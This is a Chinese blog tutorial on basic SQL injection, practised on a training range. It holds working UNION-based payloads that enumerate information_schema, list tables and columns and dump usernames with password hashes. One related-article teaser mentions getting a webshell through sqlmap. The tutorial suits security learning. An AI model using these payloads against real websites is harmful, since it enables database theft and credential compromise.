WEB漏洞—简要SQL注入

时间：2023-05-22 12:33:06浏览次数：65

标签：WEB 简要 StormGroup name 数据库表名 SQL id 列名

前言：在本系列课程学习中，SQL注入漏洞将是重点部分，其中SQL注入又非常复杂，区分各种数据库类型，提交方法，数据类型等注入，需要按部就班的学习，才能学会相关SQL注入的核心。同样此类漏洞是WEB安全中严重的安全漏洞，学习如何利用，挖掘，修复也是很重要的。

SQL注入安全测试中危害：危害数据和网站权限

大部分sql注入都是直接去对数据库里的数据进行操作，包括查询，更新，删除

某一些sql注入的时候，通过漏洞可以直接进行后门写入，有一些能获取权限，一些不能。

如何判断注入点

老办法：

id=1 and 1=1 页面正常

id=1 and 1=2 页面错误

可能存在注入点

新方法

id=1ahjdwo 页面错误

可能存在注入点

id=1asdjalj 页面正常

不存在注入点

若出现404错误或者跳转，说明网站对输入的东西有检测，这种情况大部分是没有漏洞的

数据库结构

数据库A

表名

列名

数据

要获取数据，必须按部就班，从表名>列名>数据一步一步来，不能直接获取到数据

必要知识点

1. 在MySQL 5.0以上版本中，mysql存在一个自带的数据库名为information_schema，它是一个存储所有数据库名，表名，列名的数据库，也相当于可以通过它查询获取制定数据库下面的表名或者列名信息。

2. 数据库中符号“.”代表下一级，如xiaodi.user表示xiaodi下的user表名。

information_schema.tables 记录所有表名信息的表

information_schema.columns 记录所有列名信息的表

table_name 表名

column_name 列名

table_schema 数据库名

查询指定数据库名mozhe_Discuz_StormGroup下的表名

124.70.22.208:41567/new_list.php?id=1 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查询到表名StormGroup_member

查询指定表名StormGroup_member下的列名

124.70.22.208:41567/new_list.php?id=1 and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询到列名id,name,password,status

从表StormGroup_member中查询name,password下的数据

124.70.22.208:41567/new_list.php?id=1 and 1=2 union select 1,name,password,4 from StormGroup_member

查询到账号和密码

mozhe 356f589a7df439f6f744ff19bb8092c0

猜解多个数据采用limit x,1 变动猜解 x是变量

mozhe e53f4512ea73eb2e23462f8e155245df

判断注入

猜解列名数量（字段数） order by x 错误与正确的正常值

http://124.70.22.208:41567/new_list.php?id=1 order by 4

猜解准备：

http://124.70.22.208:41567/new_list.php?id=1 union select 1,2,3,4

http://124.70.22.208:41567/new_list.php?id=1 and 1=2 union select 1,2,3,4

信息收集：(在mozhe靶场上实验)

数据库版本：version（） 5.7.22-0ubuntu0.16.04.1

数据库名：database() mozhe_Discuz_StormGroup

数据库用户：user() root@localhost

操作系统：@@version_compile_os Linux

标签：WEB,简要,StormGroup,name,数据库,表名,SQL,id,列名
From： https://www.cnblogs.com/Zx770/p/17419695.html

MySQL注入点写入WebShell的几种方式
在工具化日益成熟的今天，手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时，应更深入的去了解工具帮你做了什么，把工具所产生的影响控制在自己可控的范围内。比如：当面对一个MySQL注入点，通过使用SQLmap的--os-shell命令选项，便可轻松一键获取Webshell，但是非正常退出时，便会在网......
sql注入
把复杂的过程利用自动化 ......
为什么MySQL单表不能超过2000万行？
摘要：MySQL一张表最多能存多少数据？本文分享自华为云社区《为什么MySQL单表不能超过2000万行？》，作者：GaussDB数据库。最近看到一篇《我说MySQL每张表最好不要超过2000万数据，面试官让我回去等通知》的文章，非常有趣。文中提到，他朋友在面试的过程中说，自己的工作就是把用户操作信息......
sql server Json简单操作
操作环境：SQLServerManagementStudio15.0.18424.0SQLServer管理对象(SMO) 16.100.47021.0+7eef34a564af48c5b0cf0d617a65fd77f06c3eb1MicrosoftAnalysisServices客户端工具 15.0.19750.0Microsoft数据访问组件(MDAC) 10.0.19041.2604MicrosoftMSXML ......
nginx+tomcat+pgsql+redis离线部署过程
gccpcre-developenssl-develzlib-devel离线安装包:包含云盘地址.txt离线部署java+nginx+tomcat+pgsql+redis.zip:城通网盘:https://url86.ctfile.com/f/15666686-859830438-baa3a9?p=2048(访问密码:2048)阿里云网盘(城通速度慢可以选这个):https://www.aliyundrive......
批量执行mysql文件
mysqldumpMysql数据备份恢复目录mysqldumpMysql数据备份恢复一、需求二、Java实现Mysql备份与恢复pom.xmlmainMysqlBackupsMysqlReductionConfPropresources执行一、需求实现Mysql数据库备份与恢复/***mysqldump命令*备份库*备份所有数据库：mysqldump-h主机IP......
遇到的问题之"数据库编写SQL-》子查询中加入limit报错：This version of MySQL doesn't
一、问题 >1235-ThisversionofMySQLdoesn'tyetsupport'LIMIT&IN/ALL/ANY/SOMEsubquery'二、原因/解决方案这个错误通常是由于MySQL版本太旧导致的。在旧版本的MySQL中，无法在子查询中使用LIMIT和IN/ALL/ANY/SOME子查询。您需要升级到MySQL的较新版本，以解决......
使用docker安装postgresql
在Docker中安装PostgreSQL的详细步骤：首先，确保你已经安装了Docker。如果没有，请按照Docker官方文档的说明进行安装。打开终端并输入以下命令来搜索PostgreSQL映像：dockersearchpostgres选择一个适合你需要的映像并使用以下命令下载它：dockerpull[postgres-image-name]其中......
sqlserver 查询慢语句
SELECTTOP10total_worker_time/1000AS[自编译以来执行所用的CPU时间总量(ms-毫秒)],total_elapsed_time/1000as[完成执行此计划所用的总时间],total_elapsed_time/execution_count/1000as[平均完成执行此计划所用时间],execution_countas[上次编译以来所执行......
Python直连MySQL数据库
Python标准数据库接口为PythonDB-API,PythonDB-API为开发人员提供了数据库应用编程接口。Python数据库接口支持非常多的数据库,你可以选择适合你项目的数据库:GadFlymSQLMySQLPostgreSQLMicrosoftSQLServer2000InformixInterbaseOracleSybase你可以访问Pytho......

WEB漏洞—简要SQL注入

相关文章

赞助商

阅读排行